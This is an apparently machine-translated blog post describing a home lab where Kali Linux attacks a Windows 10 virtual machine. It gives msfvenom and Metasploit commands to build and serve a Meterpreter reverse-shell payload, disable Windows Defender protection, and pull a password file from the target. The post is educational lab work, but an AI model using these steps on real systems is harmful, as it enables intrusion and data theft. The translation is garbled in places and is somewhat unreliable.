Je veux connaître la méthode d'attaque et devenir une personne très consciente de la sécurité. Parce que c'est devant le bâtiment, les pirates sont cool, non? J'ai commencé à pratiquer le piratage avec le motif.
C'est le 4ème jour du calendrier de l'Avent de PRO Co., Ltd. Il ne s'agit pas de faire quelque chose, mais pardonnez-moi de dire "J'aurais aimé l'avoir!" ...
Construisez un environnement expérimental Windows avec VM, attaque et contrôle à distance depuis un autre environnement (Kali Linux). C'est plus long, mais il y a plus d'images.
Cet article ne recommande pas les cyberattaques telles que l'accès non autorisé. Veuillez ne pas appliquer le contenu présenté ici à l'environnement externe.
Tout d'abord, créez le terminal d'attaque et le terminal cible avec VM. Cette fois, cela a été fait dans l'environnement suivant.
Kali Linux est une distribution Linux utilisée pour les tests de pénétration. Il est basé sur Debian et est pré-installé avec plus de 300 outils de test de pénétration.
J'utiliserai Kali Linux cette fois, mais il est possible d'installer l'outil d'attaque sur le système d'exploitation que vous connaissez.
Téléchargez l'image Kali Linux à partir de la page suivante. https://www.kali.org/downloads/ Cette fois, j'ai téléchargé "Kali Linux 64-Bit".
Dans cet article, je vais omettre la méthode d'installation détaillée.
Téléchargez le fichier ISO de Windows 10 à partir de la page suivante. https://www.microsoft.com/ja-jp/software-download/windows10ISO
Créez une machine virtuelle à partir d'une nouvelle VirtualBox. C'est fait.
--Supprimez le fichier ISO du lecteur virtuel Quittez Windows 10 une fois et ouvrez Paramètres VirtualBox> Stockage. Cliquez sur l'icône du disque à droite du lecteur optique et sélectionnez Supprimer le disque du lecteur virtuel.
Vous êtes prêt à partir!
Cette expérience d'attaque sera menée dans l'environnement suivant. Le terminal d'attaque et le terminal cible doivent être sur le même réseau.
Terminal | adresse IP |
---|---|
Kali Linux (terminal d'attaque) | 10.0.0.2 |
Windows10 (terminal cible) | 10.0.0.102 |
Créez un shell inversé avec Metasploit Framework et exécutez-le sur le périphérique cible.
Il s'agit d'un outil de test de pénétration open source qui peut effectuer une série d'intrusions sur le serveur telles que l'enquête, l'intrusion, l'attaque, l'installation de porte dérobée et la connexion. Il est fourni par défaut dans Kali Linux.
Une charge utile est un code exécutable qui se comporte de manière malveillante. Cette fois, nous allons créer une charge utile TCP reverse shell.
La commande suivante crée un shell inverse TCP qui cible les fenêtres 64 bits et spécifie la destination de la connexion en tant que terminal d'attaque (10.0.0.2).
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe
La charge utile créée doit être exécutée par le terminal cible d'une manière ou d'une autre. Cette fois, démarrez Apache pour qu'il soit accessible depuis le navigateur du terminal cible.
# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart
Accédez à http://10.0.0.2/share depuis le navigateur du côté windows10.
J'ai confirmé que evil.exe existe, je vais donc le télécharger.
Lorsque j'ai cliqué sur evil.exe et choisi de l'exécuter, il a échoué car il a été détecté comme un virus par l'antivirus Windows Defender.
Si vous cliquez sur la notification en bas à droite, vous serez un peu excité de voir le nom du cheval de Troy que vous avez entendu.
Lorsque j'ai sélectionné "Autoriser" dans "Opération" et que j'ai essayé de l'enregistrer à nouveau, l'affichage a changé. Dans cet état, cliquez sur Exécuter pour enregistrer.
Désactivez ensuite la «protection en temps réel» dans le Centre de sécurité Windows Defender et téléchargez à nouveau. Veuillez vous reporter ici (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503) pour la méthode de configuration détaillée.
Cette fois, le téléchargement a réussi sans aucun avertissement.Lorsque vous ouvrez le dossier, vous pouvez voir qu'il existe deux fichiers, l'un enregistré lorsque la protection en temps réel est activée (evil.exe) et l'autre enregistré lorsque la protection en temps réel est désactivée (evil (1) .exe).
Exécutez la commande suivante sur le terminal attaquant et attendez la connexion par le shell inversé.
# msfconsole <----contribution
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v5.0.62-dev ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5> utiliser exploit / multi / handler <---- input
msf5 exploit (multi / handler)> définir la charge utile windows / x64 / meterpreter / reverse_tcp <---- input
payload => windows/x64/meterpreter/reverse_tcp
exploit msf5 (multi / handler)> set LHOST 10.0.0.2 <---- entrée
LHOST=>10.0.0.2
exploit msf5 (multi / gestionnaire)> exploit -j -z <---- entrée
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Démarrage du gestionnaire TCP inversé sur 10.0.0.2: 4444 <---- Démarrer l'écoute
msf5 exploit(multi/handler) >
###Exécutez la charge utile sur le terminal cible
Exécutez la charge utile côté Windows. Celui téléchargé lorsque la protection en temps réel est activée et celui téléchargé lorsque la protection en temps réel est désactivée sont exécutés au total quatre fois dans le schéma de la protection en temps réel activée et désactivée, respectivement.
[Au moment du téléchargement] Protection en temps réel activée (evil.exe) |
[Au moment du téléchargement] Protection en temps réel désactivée (evil(1).exe) |
|
---|---|---|
【Durée】 Protection en temps réel activée |
Échec d'attaque | Échec d'attaque |
【Durée】 Protection en temps réel désactivée |
Échec d'attaque | Attaque réussie |
Tous donnent un avertissement au moment de l'exécution, mais des détails>Exécuter de force par exécution.
Cliquez ici pour afficher l'écran au moment de l'échec.
En cas de succès, ce qui suit sera affiché sur la console attaquante.
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900
Dans cet état, appuyez sur Entrée, puis utilisez la commande sessions pour afficher la liste des sessions.
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)
Environnement d'attaque (10.0.0.2) pour cibler l'environnement (10).0.0.La connexion à 102) a été confirmée.
###Télécommande à l'invite de Meterpreter
Puis mot de passe pour l'expérience.Créez un fichier txt côté Windows.
Affichez l'invite Meterpreter en spécifiant l'ID de session côté attaquant.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
password.Trouvez et téléchargez txt.
meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-12-01 21:24:25 +0900 desktop.ini
100777/rwxrwxrwx 7168 fil 2019-12-04 08:21:32 +0900 evil (1).exe
100777/rwxrwxrwx 7168 fil 2019-12-04 09:07:02 +0900 evil.exe
100666/rw-rw-rw- 8 fil 2019-12-04 09:15:30 +0900 password.txt
meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download : password.txt -> password.txt
meterpreter >
Ouvrez un autre terminal et assurez-vous de pouvoir le télécharger.
root@kali:~# ls -la password.txt
-rw-r--r-- 1 root root 8 Dec 4 09:15 password.txt
J'ai pu le télécharger en toute sécurité (?)! !!
#Résumé
J'ai utilisé Kali Linux pour attaquer Windows 10 et expérimenté le contrôle à distance. C'était surprenant que ce soit plus facile que ce à quoi je m'attendais. Personnellement, je pense que c'est une bonne chose que j'ai réalisé que Windows Defender fait du bon travail.
La prochaine étape est de créer une porte dérobée, d'usurper la charge utile et bien plus encore, donc je pourrais en écrire plus.
#Livre de référence